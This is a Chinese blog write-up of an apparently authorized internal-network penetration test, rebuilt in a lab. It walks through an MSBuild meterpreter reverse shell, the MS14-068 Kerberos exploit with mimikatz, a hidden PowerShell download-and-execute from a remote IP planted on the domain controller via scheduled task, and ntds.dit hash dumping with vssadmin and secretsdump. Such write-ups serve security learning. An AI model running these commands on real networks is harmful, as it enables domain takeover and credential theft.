一次授权任务的内网渗透

admin 2021年12月6日19:29:06安全文章评论37 views1491字阅读4分58秒阅读模式

一次授权任务的内网渗透

一、前言


在一次授权的渗透测试刚好遇到个存在ms14068的域环境由于对方不让写真实环境发表文章就自己搭建了类型相同的环境还是太菜大佬们别喷我。

二、白加黑反弹shell


由于对方存在360应该是好久没更新过

了直接用MSBuild就反弹shell到msf上了
msfVENOM生成shellcode:


msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=xx.xx.xx.xx l


一次授权任务的内网渗透

shellcode.xml修改该xml的shellcode为msfvenom生成的将该文件上传至服务器进入msbuild目录:C:WindowsMicrosoft.NETFramework64v4.0.30319利用webshell执行:MSBuild.exe "C:wwwrootexecutes x64 shellcode.xml"


一次授权任务的内网渗透


三、MS14-68获取域控
通过内网信息收集获取域控主机名


net group "domain controllers" /domain


通过ping主机名获取域控的ip地址

一次授权任务的内网渗透

通过systeminfo发现没有打KB3011780补丁向服务器上传mimikatz和ms14-068exp。
先将内存中的kerberos票据清除


一次授权任务的内网渗透

查看本机id:whoami /all

一次授权任务的内网渗透

执行ms14068exp:MS14-068 -u 用户名@域 -p 密码 -s SID -d 域控ip

一次授权任务的内网渗透

执行成功后会在当前目录下生成一个证书利用mimikatz导入证书

kerberos::ptc C:wwwrootTGT[email protected]


一次授权任务的内网渗透

dir获取域控c盘的目录

一次授权任务的内网渗透

利用ipc进行入侵copy一个bat文件到域控上利用at创建计划任务在bat中写入cs生成的powershell恶意代码

echo powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.132.43.162:8080/a'))" > 3.bat


一次授权任务的内网渗透

net use \DC-FANXINGc$copy 3.bat \DC-FANXINGc$


一次授权任务的内网渗透


获取域控系统时间at创建计划任务


net time \DC-FANXING
at \DC-FANXING 23:39:40 C:3.bat


一次授权任务的内网渗透

一次授权任务的内网渗透

四、导出ntds.dit文件
为了获取所有的用户hash我在域控上导出ntds文件这里导出的方式有很多比如ntdsutilvssadminvshadow等等这里我使用vssadmin导出ntds文件。
cs移植到msf上执行run 读取密码hash解出管理员密码为[email protected]

一次授权任务的内网渗透

端口转发登录3389端口

一次授权任务的内网渗透

创建快照:vssadmin create shadow /for=c:

一次授权任务的内网渗透复制ntds.dit:copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.dit

一次授权任务的内网渗透

复制system文件:copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsSystem32configSYSTEM

一次授权任务的内网渗透

最后下载这两个文件到利用secretsdump.py来提取ntds文件即可


python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL


五、后记
由于不允许文章打码方式放出来只能本地搭建环境好好学习天天向上。

一次授权任务的内网渗透


本文始发于微信公众号(疯猫网络):一次授权任务的内网渗透

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月6日19:29:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一次授权任务的内网渗透 http://cn-sec.com/archives/507704.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: